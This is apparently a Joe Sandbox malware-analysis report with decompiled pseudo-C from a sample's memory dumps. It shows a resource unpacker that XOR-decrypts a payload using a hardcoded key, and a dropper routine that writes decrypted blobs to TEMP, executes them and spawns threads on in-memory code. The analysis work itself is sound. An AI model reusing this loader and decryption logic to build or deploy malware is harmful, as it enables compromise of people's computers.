Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Crypt$Context$Acquire$DestroyEncryptErrorImportLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 3736710109-947817771
Opcode ID: a580c414a6f780aecf9ca1925e7721a486cca4ea517db96ead6d5debf2f75543
Instruction ID: 073036156a227ab269f6199982c6e62e9abf2561c3e32999b52b046b74d0c6c6
Opcode Fuzzy Hash: a580c414a6f780aecf9ca1925e7721a486cca4ea517db96ead6d5debf2f75543
Instruction Fuzzy Hash: D231FD75A40208EFFB54DFA4C849BAE77B9FB44701F14C658F605B62C0D7B8AA80CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00401EBB Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 107
librarymemorynativeCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00401EBB(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				void* _v16;
				char _v28;
				signed int _v32;
				char* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v408;
				intOrPtr _v412;
				char _v416;
				char _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v476;
				char _v480;
				char* _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				char* _v512;
				char* _v516;
				intOrPtr _v520;
				char _v524;
				char* _v528;
				signed int _v532;
				char* _v536;
				intOrPtr* _t60;
				char* _t66;
				intOrPtr _t67;
				signed int _t95;
				signed int _t105;
				void* _t110;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t114;

				_t94 = __ecx;
				_t111 = _t110 - 0x1ec;
				_v456 = E00418AA0;
				_v452 = 0x419106;
				_t60 =  &_v448;
				 *_t60 =  &_v28;
				 *((intOrPtr*)(_t60 + 4)) = E00402044;
				 *((intOrPtr*)(_t60 + 8)) = _t111;
				 *_t111 =  &_v480;
				E0040E1A0(__ecx, E00402044);
				_v52 = 0;
				_v36 = "s4qYr%myN9I#LzO$Zl35Lk@w#T(T6#^hn^vZ";
				_v40 = 0;
				_v44 = 0;
				_v60 = 0;
				_v64 = 0;
				_v416 = L"OMT";
				_v412 = _a4;
				_v408 = 0x409;
				_v496 =  &_v56;
				_v500 = 3;
				_t66 =  &_v416;
				_v504 = _t66;
				 *_t111 = 0x400000;
				_v476 = 1;
				L00404F64();
				_v48 = _t66;
				_t67 = _v56;
				_v512 =  &_v64;
				_v516 =  &_v60;
				_v520 = _t67;
				_v524 = 0x400000;
				L00404F6C();
				_t113 = _t111;
				_v48 = _t67;
				_v520 = 0x40;
				_v524 = 0x3000;
				_v528 =  &_v64;
				_v532 = 0;
				_v536 =  &_v52;
				 *_t113 = 0xffffffff; // executed
				NtAllocateVirtualMemory(??, ??, ??, ??, ??, ??); // executed
				_t114 = _t113 - 0x18;
				_v32 = 0;
				while(_v32 < _v64) {
					_t95 = _v32;
					_t105 = ((_t95 * 0xdd67c8a7 >> 0x20) + _t95 >> 5) - (_t95 >> 0x1f);
					_t94 = _t95 - ((_t105 << 3) + _t105 << 2) + _t105;
					 *((char*)(_v52 + _v32)) = _v36[_t95 - ((_t105 << 3) + _t105 << 2) + _t105] & 0x000000ff ^  *(_v32 + _v60) & 0x000000ff;
					_v32 = _v32 + 1;
				}
				_t107 = _v52;
				 *_a8 = _v52;
				 *_t114 =  &_v480;
				return E0040E320(_t94, _t107);
			}

0x00401ebb
0x00401ec1
0x00401ec7
0x00401ed1
0x00401edb
0x00401ee4
0x00401eeb
0x00401eee
0x00401ef7
0x00401efa
0x00401eff
0x00401f06
0x00401f0d
0x00401f14
0x00401f1b
0x00401f22
0x00401f2e
0x00401f37
0x00401f3d
0x00401f4a
0x00401f4e
0x00401f56
0x00401f5c
0x00401f60
0x00401f67
0x00401f71
0x00401f79
0x00401f7c
0x00401f82
0x00401f89
0x00401f8d
0x00401f91
0x00401f98
0x00401f9d
0x00401fa0
0x00401fa3
0x00401fab
0x00401fb6
0x00401fba
0x00401fc5
0x00401fc9
0x00401fd0
0x00401fd5
0x00401fd8
0x00402030
0x00401ff5
0x0040200e
0x0040201c
0x0040202a
0x0040202c
0x0040202c
0x0040203a
0x00402040
0x00402065
0x00402074

APIs

LdrFindResource_U.NTDLL ref: 00401F71
LdrAccessResource.NTDLL ref: 00401F98
NtAllocateVirtualMemory.NTDLL ref: 00401FD0

Strings

OMT, xrefs: 00401F29
s4qYr%myN9I#LzO$Zl35Lk@w#T(T6#^hn^vZ, xrefs: 00401F06
@, xrefs: 00401FA3

Memory Dump Source

Source File: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: AccessAllocateFindMemoryResourceResource_Virtual
String ID: @$OMT$s4qYr%myN9I#LzO$Zl35Lk@w#T(T6#^hn^vZ
API String ID: 2485490239-3843035961
Opcode ID: 3ba9d8c3c3de79a090e3b742c6c1ed1d57ad730d95a193a03d7c314015c75e69
Instruction ID: ff8897463fb2fbedf42f4e80d1da6419d3676337a3971e8b30f16ddae3d354f8
Opcode Fuzzy Hash: 3ba9d8c3c3de79a090e3b742c6c1ed1d57ad730d95a193a03d7c314015c75e69
Instruction Fuzzy Hash: EE4106B09042199FCB00DF69C884BDEFBF4EB89304F10C56AE958A7341D7789A49CF95

Uniqueness

Uniqueness Score: -1.00%

Function 040097A0 Relevance: 3.0, APIs: 2, Instructions: 10
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E040097A0(long _a4) {
				void* _t4;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 8, _a4); // executed
				return _t4;
			}

0x040097b0
0x040097b7

APIs

GetProcessHeap.KERNEL32(00000008,04009FB2,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097A9
RtlAllocateHeap.NTDLL(00000000,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097B0

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: e19e0248bdcccd87c05d7a61fb539eafc2efb7858191fd7307808dd8c9195d95
Instruction ID: 51615621b5a1f832d01dc3b7a4cc229a82638b6a1205cca077e68d01418531cd
Opcode Fuzzy Hash: e19e0248bdcccd87c05d7a61fb539eafc2efb7858191fd7307808dd8c9195d95
Instruction Fuzzy Hash: 93C09B71144308ABE6449FD8E80DD95375DE748601F004111B70DD6141CB7CAD84C762

Uniqueness

Uniqueness Score: -1.00%

Function 04009F70 Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E04009F70(intOrPtr _a4, signed int _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				void* _v32;
				intOrPtr* _t59;
				intOrPtr _t64;
				void* _t99;
				void* _t100;

				_v8 = 1;
				if(_a4 != 0) {
					_t103 = _a8 - 5;
					if(_a8 > 5) {
						asm("cdq");
						_t59 = E040097A0( ~(0 | _t103 > 0x00000000) | _a8 / 0x00000006 * 0x00000288); // executed
						_t100 = _t99 + 4;
						_v28 = _t59;
						_v12 = _v28;
						if(_v12 != 0) {
							_v16 = _v12;
							_v20 = _a8 * 0x288 / 6;
							_push( &_v20);
							_t64 = _v12;
							_push(_t64); // executed
							L0400B1DA(); // executed
							if(_t64 == 0) {
								_v24 = 0;
								while(_v12 != 0 && _v24 < _a8) {
									if( *((intOrPtr*)(_v12 + 0x190)) < _a8 - _v24) {
										E04007B70(_a4 + _v24, _v12 + 0x194,  *((intOrPtr*)(_v12 + 0x190)));
										_t100 = _t100 + 0xc;
										_v24 = _v24 +  *((intOrPtr*)(_v12 + 0x190));
										_v12 =  *_v12;
										_v8 = 1;
										continue;
									}
									break;
								}
								 *_a12 = _v24;
							}
							_v32 = _v16;
							E040097C0(_v32);
						}
					}
				}
				return _v8;
			}

0x04009f76
0x04009f81
0x04009f87
0x04009f8b
0x04009f94
0x04009fad
0x04009fb2
0x04009fb5
0x04009fbb
0x04009fc2
0x04009fcb
0x04009fe0
0x04009fe6
0x04009fe7
0x04009fea
0x04009feb
0x04009ff2
0x04009ff4
0x04009ffb
0x0400a018
0x0400a034
0x0400a039
0x0400a048
0x0400a050
0x0400a053
0x00000000
0x0400a05e
0x00000000
0x0400a018
0x0400a066
0x0400a066
0x0400a06b
0x0400a072
0x0400a077
0x04009fc2
0x04009f8b
0x0400a080

APIs

Part of subcall function 040097A0: GetProcessHeap.KERNEL32(00000008,04009FB2,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097A9
Part of subcall function 040097A0: RtlAllocateHeap.NTDLL(00000000,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097B0

GetAdaptersInfo.IPHLPAPI(00000000,04009E2D), ref: 04009FEB

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Heap$AdaptersAllocateInfoProcess
String ID:
API String ID: 1318000056-0
Opcode ID: 73ff96f27f52de9840d8f092c1af349ff5175d9842f98ddb7f52f1a4bac05a00
Instruction ID: 97f005e152f21f2c2f7fd10924b0caa403664ba6d1ad8a9a516f1bf18f754b30
Opcode Fuzzy Hash: 73ff96f27f52de9840d8f092c1af349ff5175d9842f98ddb7f52f1a4bac05a00
Instruction Fuzzy Hash: B931FBB5E00209EFEB04CF98C494AEEB7B5EF48308F10C169E909A7390D735AA45CF51

Uniqueness

Uniqueness Score: -1.00%

Function 040062B0 Relevance: 56.7, APIs: 29, Strings: 3, Instructions: 657
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E040062B0(intOrPtr* _a4, intOrPtr _a8) {
				long _v8;
				intOrPtr _v12;
				signed int _v13;
				void* _v20;
				int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void _v36;
				void* _v40;
				long _v44;
				signed int _v48;
				void* _v52;
				long _v56;
				void _v60;
				char _v324;
				void* _v328;
				char _v340;
				char _v604;
				int _v608;
				long _v612;
				signed int _v616;
				void* _v620;
				void* _v624;
				void* _v628;
				int _v632;
				signed int _v636;
				long _v640;
				void* _v644;
				void* _v648;
				void* _v652;
				char _v916;
				void* _v920;
				char _v932;
				char _v1196;
				long _v1200;
				int _v1204;
				long _v1208;
				void* _v1212;
				long _v1216;
				signed int _v1220;
				void* _v1224;
				void* _v1228;
				intOrPtr _t317;
				signed char _t321;
				void* _t333;
				signed int _t340;
				void* _t349;
				signed int _t355;
				void* _t361;
				void* _t368;
				void* _t378;
				void* _t381;
				signed int _t383;
				void* _t386;
				void* _t393;
				int _t415;
				signed int _t421;
				signed int _t428;
				signed char _t433;
				void* _t439;
				signed char _t442;
				void* _t448;
				signed int _t452;
				intOrPtr _t455;
				void* _t465;
				void* _t472;
				void* _t473;
				void* _t508;
				void* _t509;
				void* _t528;
				void* _t529;
				void* _t539;
				void* _t549;
				void* _t550;
				void* _t551;
				void* _t563;
				void* _t598;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0) {
					L99:
					return _v8;
				} else {
					_v12 =  *_a4;
					if(_v12 > 0 && _v12 < 0x400) {
						_v20 = _a4 + 4;
						_v24 = 0;
						while(_v24 < _v12) {
							if(_v24 <= 0) {
								L10:
								_v28 = _v20 + 0x18;
								_v32 =  *_v20 - 0x18;
								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e270; // 0x1
								if(__eflags != 0) {
									L22:
									_t428 = _v24 + 1;
									__eflags = _t428;
									_v24 = _t428;
									continue;
								}
								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
								if(__eflags != 0) {
									goto L22;
								}
								_t508 = _v20;
								__eflags =  *(_t508 + 0xc) & 0x00000002;
								if(( *(_t508 + 0xc) & 0x00000002) == 0) {
									goto L22;
								}
								__eflags =  *0x401435d & 0x000000ff;
								if(( *0x401435d & 0x000000ff) == 0) {
									goto L22;
								}
								_t509 = _v20;
								__eflags =  *(_t509 + 0xc) & 0x00000010;
								if(( *(_t509 + 0xc) & 0x00000010) == 0) {
									_t433 = E04001EE0(_v28, 0xea60);
									_t598 = _t598 + 8;
									_v8 = _t433 & 0x000000ff;
									L21:
									break;
								}
								_v44 =  *((intOrPtr*)(_v28 + _v32 - 4));
								_v40 = VirtualAlloc(0, _v44, 0x3000, 4);
								__eflags = _v40;
								if(_v40 == 0) {
									L19:
									goto L21;
								}
								_t439 = E04006260(_v40, _v28, _v32, _v40, _v44);
								__eflags = _t439 - _v44;
								if(_t439 == _v44) {
									_t442 = E04001EE0(_v40, 0xea60);
									_t598 = _t598 + 8;
									_v8 = _t442 & 0x000000ff;
								}
								VirtualFree(_v40, 0, 0x8000);
								goto L19;
							} else {
								_v36 =  *_v20;
								_v20 = _v20 + _v36;
								if(_v20 <= _a4 + _a8) {
									goto L10;
								} else {
									return 0;
								}
							}
						}
						_v13 = 0;
						_v20 = _a4 + 4;
						_v48 = 0;
						while(1) {
							__eflags = _v48 - _v12;
							if(_v48 >= _v12) {
								break;
							}
							__eflags = _v48;
							if(_v48 <= 0) {
								L29:
								_v52 = _v20 + 0x18;
								_v56 =  *_v20 - 0x18;
								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e274; // 0x2
								if(__eflags != 0) {
									L39:
									_t448 = _v20;
									__eflags =  *(_t448 + 0xc) & 0x00000002;
									if(( *(_t448 + 0xc) & 0x00000002) == 0) {
										__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e270; // 0x1
										if(__eflags != 0) {
											L90:
											__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e278; // 0x3
											if(__eflags != 0) {
												L93:
												__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e27c; // 0x4
												if(__eflags == 0) {
													_v13 = 1;
												}
												L95:
												L24:
												_t452 = _v48 + 1;
												__eflags = _t452;
												_v48 = _t452;
												continue;
											}
											__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e288; // 0x2
											if(__eflags != 0) {
												goto L93;
											}
											_t317 =  *0x400e28c; // 0x4013f88
											_t455 =  *0x40118a0; // 0x4013b88
											E0400A360(_t455, _t317, _v52, _v56);
											_t598 = _t598 + 0x10;
											goto L95;
										}
										__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
										if(__eflags != 0) {
											goto L90;
										}
										_t321 = E04007250(_v20, _v52, _v56);
										_t598 = _t598 + 0xc;
										__eflags = _t321 & 0x000000ff;
										if((_t321 & 0x000000ff) != 0) {
											_t528 = _v20;
											__eflags =  *(_t528 + 0x14);
											if( *(_t528 + 0x14) == 0) {
												L48:
												_t529 = _v20;
												__eflags =  *(_t529 + 0xc) & 0x00000001;
												if(( *(_t529 + 0xc) & 0x00000001) == 0) {
													GetEnvironmentVariableA("TEMP",  &_v1196, 0x104);
													E04007D20( &_v932,  &_v932, 0, 0xa);
													E04009730( &_v932, 4);
													_t598 = _t598 + 0x14;
													GetTempFileNameA( &_v1196,  &_v932, GetTickCount() % 0xffff,  &_v916);
													_v920 = CreateFileA( &_v916, 0x40000000, 1, 0, 2, 0, 0);
													__eflags = _v920 - 0xffffffff;
													if(_v920 == 0xffffffff) {
														L89:
														goto L24;
													}
													_v1200 = 0;
													_v1204 = 0;
													_v1208 = _v56;
													_t333 = _v20;
													__eflags =  *(_t333 + 0xc) & 0x00000010;
													if(( *(_t333 + 0xc) & 0x00000010) == 0) {
														_v1204 = WriteFile(_v920, _v52, _v56,  &_v1200, 0);
													} else {
														_v1216 =  *((intOrPtr*)(_v52 + _v56 - 4));
														_v1212 = VirtualAlloc(0, _v1216, 0x3000, 4);
														__eflags = _v1212;
														if(_v1212 != 0) {
															_t349 = E04006260(_v56, _v52, _v56, _v1212, _v1216);
															__eflags = _t349 - _v1216;
															if(_t349 == _v1216) {
																_v1204 = WriteFile(_v920, _v1212, _v1216,  &_v1200, 0);
																_v1208 = _v1216;
															}
															VirtualFree(_v1212, 0, 0x8000);
														}
													}
													__eflags = _v1204;
													if(_v1204 == 0) {
														L88:
														CloseHandle(_v920);
													} else {
														__eflags = _v1200 - _v1208;
														if(_v1200 != _v1208) {
															goto L88;
														}
														CloseHandle(_v920);
														_t340 = E04001E60( &_v916);
														_t598 = _t598 + 4;
														_v1220 = _t340;
														__eflags = _v1220;
														if(_v1220 != 0) {
															_t465 = _v20;
															__eflags =  *(_t465 + 0x10);
															if( *(_t465 + 0x10) != 0) {
																E040073C0(_v20, _v52, _v56);
																_t598 = _t598 + 0xc;
															}
															_t539 = _v20;
															__eflags =  *(_t539 + 0xc) & 0x00000004;
															if(( *(_t539 + 0xc) & 0x00000004) != 0) {
																E04002510(_v1220, 0x400e290);
																_t598 = _t598 + 8;
															}
															_v8 = 1;
														}
													}
													goto L89;
												}
												_v636 = 0;
												_v632 = 0;
												_v640 = 0;
												_t472 = _v20;
												__eflags =  *(_t472 + 0xc) & 0x00000010;
												if(( *(_t472 + 0xc) & 0x00000010) == 0) {
													_t355 = E04002070(_v52);
													_t598 = _t598 + 4;
													_v636 = _t355;
												} else {
													_v640 =  *((intOrPtr*)(_v52 + _v56 - 4));
													_t378 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
													_v644 = _t378;
													__eflags = _v644;
													if(_v644 != 0) {
														_t381 = E04006260(_v644, _v52, _v56, _v644, _v640);
														__eflags = _t381 - _v640;
														if(_t381 == _v640) {
															_t383 = E04002070(_v644); // executed
															_t598 = _t598 + 4;
															_v636 = _t383;
															_t563 = _v20;
															__eflags =  *(_t563 + 0xc) & 0x00000008;
															if(( *(_t563 + 0xc) & 0x00000008) != 0) {
																_t386 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
																_v632 = _t386;
																E04007B70(_v632, _v644, _v640);
																_t598 = _t598 + 0xc;
															}
														}
														VirtualFree(_v644, 0, 0x8000); // executed
													}
												}
												__eflags = _v636;
												if(_v636 != 0) {
													_t473 = _v20;
													__eflags =  *(_t473 + 0x10);
													if( *(_t473 + 0x10) != 0) {
														E040073C0(_v20, _v52, _v56);
														_t598 = _t598 + 0xc;
													}
													_t549 = _v20;
													__eflags =  *(_t549 + 0xc) & 0x00000008;
													if(( *(_t549 + 0xc) & 0x00000008) != 0) {
														_t361 = E040097A0(0x10);
														_t598 = _t598 + 4;
														_v1228 = _t361;
														_v648 = _v1228;
														_t551 = _v20;
														__eflags =  *(_t551 + 0xc) & 0x00000010;
														if(( *(_t551 + 0xc) & 0x00000010) == 0) {
															 *_v648 = VirtualAlloc(0, _v56, 0x3000, 4);
															__eflags =  *_v648;
															if( *_v648 != 0) {
																E04007B70( *_v648, _v52, _v56);
																_t598 = _t598 + 0xc;
																 *(_v648 + 4) = _v56;
															}
														} else {
															 *_v648 = _v632;
															 *(_v648 + 4) = _v640;
														}
														__eflags =  *_v648;
														if( *_v648 != 0) {
															 *((intOrPtr*)(_v648 + 8)) =  *((intOrPtr*)(_v20 + 0xc));
															 *((intOrPtr*)(_v648 + 0xc)) = _v636;
															_t368 = CreateThread(0, 0, E040077B0, _v648, 0, 0); // executed
															_v652 = _t368;
															CloseHandle(_v652);
														}
													}
													_t550 = _v20;
													__eflags =  *(_t550 + 0xc) & 0x00000004;
													if(( *(_t550 + 0xc) & 0x00000004) != 0) {
														E04002510(_v636, 0x400e290);
														_t598 = _t598 + 8;
													}
													_v8 = 1;
												}
												goto L24;
											}
											_v620 = VirtualAlloc(0, _v56, 0x3000, 4);
											__eflags = _v620;
											if(_v620 == 0) {
												goto L48;
											}
											E04007B70(_v620, _v52, _v56);
											_t393 = E040097A0(0x20);
											_t598 = _t598 + 0x10;
											_v1224 = _t393;
											_v624 = _v1224;
											 *_v624 =  *_v20;
											 *((intOrPtr*)(_v624 + 4)) =  *((intOrPtr*)(_v20 + 4));
											 *((intOrPtr*)(_v624 + 8)) =  *((intOrPtr*)(_v20 + 8));
											 *((intOrPtr*)(_v624 + 0x14)) =  *((intOrPtr*)(_v20 + 0x14));
											 *((intOrPtr*)(_v624 + 0x1c)) = _v56;
											 *((intOrPtr*)(_v624 + 0xc)) =  *((intOrPtr*)(_v20 + 0xc));
											 *((intOrPtr*)(_v624 + 0x10)) =  *((intOrPtr*)(_v20 + 0x10));
											 *(_v624 + 0x18) = _v620;
											_v628 = CreateThread(0, 0, E04006DA0, _v624, 0, 0);
											CloseHandle(_v628);
											goto L24;
										}
										goto L24;
									}
									goto L24;
								}
								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
								if(__eflags != 0) {
									goto L39;
								}
								GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
								E04007D20( &_v340,  &_v340, 0, 0xa);
								E04009730( &_v340, 4);
								_t598 = _t598 + 0x14;
								GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
								_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0x80, 0);
								__eflags = _v328 - 0xffffffff;
								if(_v328 == 0xffffffff) {
									goto L39;
								}
								_v608 = 0;
								_v612 = 0;
								_t415 = WriteFile(_v328, _v52, _v56,  &_v612, 0);
								__eflags = _t415;
								if(_t415 == 0) {
									L37:
									__eflags = _v608;
									if(_v608 == 0) {
										CloseHandle(_v328);
									}
									goto L39;
								}
								__eflags = _v612 - _v56;
								if(_v612 != _v56) {
									goto L37;
								}
								_v608 = CloseHandle(_v328);
								E04006C60();
								_t421 = E04001E60( &_v324);
								_t598 = _t598 + 4;
								_v616 = _t421;
								__eflags = _v616;
								if(_v616 == 0) {
									E04006CF0();
									goto L37;
								}
								E040074A0();
								ExitProcess(0);
							}
							_v60 =  *_v20;
							_v20 = _v20 + _v60;
							__eflags = _v20 - _a4 + _a8;
							if(_v20 <= _a4 + _a8) {
								goto L29;
							}
							return 0;
						}
						__eflags = (_v13 & 0x000000ff) - 1;
						if((_v13 & 0x000000ff) != 1) {
							 *0x40130e4 = 1;
						} else {
							 *0x40130e4 = 2;
						}
					}
					goto L99;
				}
			}

0x040062b9
0x040062c4
0x04006c4e
0x00000000
0x040062d4
0x040062d9
0x040062e0
0x040062f9
0x040062fc
0x0400630e
0x0400631e
0x04006343
0x04006349
0x04006354
0x0400635d
0x04006363
0x04006429
0x04006308
0x04006308
0x0400630b
0x00000000
0x0400630b
0x0400636f
0x04006375
0x00000000
0x00000000
0x0400637b
0x04006381
0x04006384
0x00000000
0x00000000
0x04006391
0x04006393
0x00000000
0x00000000
0x04006399
0x0400639f
0x040063a2
0x04006419
0x0400641e
0x04006424
0x04006427
0x00000000
0x04006427
0x040063ad
0x040063c3
0x040063c6
0x040063ca
0x0400640e
0x00000000
0x0400640e
0x040063dc
0x040063e1
0x040063e4
0x040063ef
0x040063f4
0x040063fa
0x040063fa
0x04006408
0x00000000
0x04006320
0x04006325
0x0400632e
0x0400633a
0x00000000
0x0400633c
0x00000000
0x0400633c
0x0400633a
0x0400631e
0x0400642e
0x04006438
0x0400643b
0x0400644d
0x04006450
0x04006453
0x00000000
0x00000000
0x04006459
0x0400645d
0x04006482
0x04006488
0x04006493
0x0400649c
0x040064a2
0x040065f3
0x040065f3
0x040065f9
0x040065fc
0x04006609
0x0400660f
0x04006bdd
0x04006be3
0x04006be9
0x04006c18
0x04006c1e
0x04006c24
0x04006c26
0x04006c26
0x04006c2a
0x04006444
0x04006447
0x04006447
0x0400644a
0x00000000
0x0400644a
0x04006bf1
0x04006bf7
0x00000000
0x00000000
0x04006c01
0x04006c07
0x04006c0e
0x04006c13
0x00000000
0x04006c13
0x0400661b
0x04006621
0x00000000
0x00000000
0x04006633
0x04006638
0x0400663e
0x04006640
0x04006647
0x0400664a
0x0400664e
0x04006752
0x04006752
0x04006758
0x0400675b
0x040069cb
0x040069dc
0x040069ed
0x040069f2
0x04006a1a
0x04006a3c
0x04006a42
0x04006a49
0x04006bd6
0x00000000
0x04006bd6
0x04006a4f
0x04006a59
0x04006a66
0x04006a6c
0x04006a72
0x04006a75
0x04006b3c
0x04006a7b
0x04006a84
0x04006aa0
0x04006aa6
0x04006aad
0x04006ac5
0x04006aca
0x04006ad0
0x04006af6
0x04006b02
0x04006b02
0x04006b16
0x04006b16
0x04006b1c
0x04006b42
0x04006b49
0x04006bc9
0x04006bd0
0x04006b4b
0x04006b51
0x04006b57
0x00000000
0x00000000
0x04006b60
0x04006b6d
0x04006b72
0x04006b75
0x04006b7b
0x04006b82
0x04006b84
0x04006b87
0x04006b8b
0x04006b99
0x04006b9e
0x04006b9e
0x04006ba1
0x04006ba7
0x04006baa
0x04006bb8
0x04006bbd
0x04006bbd
0x04006bc0
0x04006bc0
0x04006bc7
0x00000000
0x04006b49
0x04006761
0x0400676b
0x04006775
0x0400677f
0x04006785
0x04006788
0x0400685c
0x04006861
0x04006864
0x0400678e
0x04006797
0x040067ad
0x040067b3
0x040067b9
0x040067c0
0x040067dc
0x040067e1
0x040067e7
0x040067f0
0x040067f5
0x040067f8
0x040067fe
0x04006804
0x04006807
0x04006819
0x0400681f
0x0400683a
0x0400683f
0x0400683f
0x04006807
0x04006850
0x04006850
0x04006856
0x0400686a
0x04006871
0x04006877
0x0400687a
0x0400687e
0x0400688c
0x04006891
0x04006891
0x04006894
0x0400689a
0x0400689d
0x040068a5
0x040068aa
0x040068ad
0x040068b9
0x040068bf
0x040068c5
0x040068c8
0x04006902
0x0400690a
0x0400690d
0x04006920
0x04006925
0x04006931
0x04006931
0x040068ca
0x040068d6
0x040068e4
0x040068e4
0x0400693a
0x0400693d
0x0400694b
0x0400695a
0x04006971
0x04006977
0x04006984
0x04006984
0x0400693d
0x0400698a
0x04006990
0x04006993
0x040069a1
0x040069a6
0x040069a6
0x040069a9
0x040069a9
0x00000000
0x040069b0
0x04006667
0x0400666d
0x04006674
0x00000000
0x00000000
0x04006689
0x04006693
0x04006698
0x0400669b
0x040066a7
0x040066b8
0x040066c6
0x040066d5
0x040066e4
0x040066f0
0x040066ff
0x0400670e
0x0400671d
0x0400673a
0x04006747
0x00000000
0x04006747
0x00000000
0x04006642
0x00000000
0x040065fe
0x040064ae
0x040064b4
0x00000000
0x00000000
0x040064cb
0x040064dc
0x040064ed
0x040064f2
0x0400651a
0x0400653f
0x04006545
0x0400654c
0x00000000
0x00000000
0x04006552
0x0400655c
0x0400657e
0x04006584
0x04006586
0x040065dd
0x040065dd
0x040065e4
0x040065ed
0x040065ed
0x00000000
0x040065e4
0x0400658e
0x04006591
0x00000000
0x00000000
0x040065a0
0x040065a6
0x040065b2
0x040065b7
0x040065ba
0x040065c0
0x040065c7
0x040065d8
0x00000000
0x040065d8
0x040065c9
0x040065d0
0x040065d0
0x04006464
0x0400646d
0x04006476
0x04006479
0x00000000
0x00000000
0x00000000
0x0400647b
0x04006c33
0x04006c36
0x04006c44
0x04006c38
0x04006c38
0x04006c38
0x04006c36
0x00000000
0x040062e0

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 040063BD
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 04006408

Strings

TEMP, xrefs: 040069C6
TEMP, xrefs: 040064C6
Hogerfazwafx, xrefs: 04006C06

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

